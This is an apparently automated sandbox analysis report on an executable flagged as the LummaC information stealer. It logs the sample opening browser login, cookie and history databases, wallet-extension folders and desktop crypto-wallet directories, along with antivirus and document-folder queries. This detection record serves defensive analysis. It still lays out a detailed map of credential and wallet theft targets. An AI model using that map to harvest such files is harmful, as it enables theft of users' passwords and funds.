              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ppdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":01r"|:
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash
              Source: SET_UP.exeString found in binary or memory: Jaxx Liberty
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\c
              Source: SET_UP.exe, 00000000.00000003.1988519960.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: SET_UP.exe, 00000000.00000003.1976169185.0000000000949000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["
              Source: SET_UP.exe, 00000000.00000003.1988905738.0000000000957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SET_UP.exe, 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
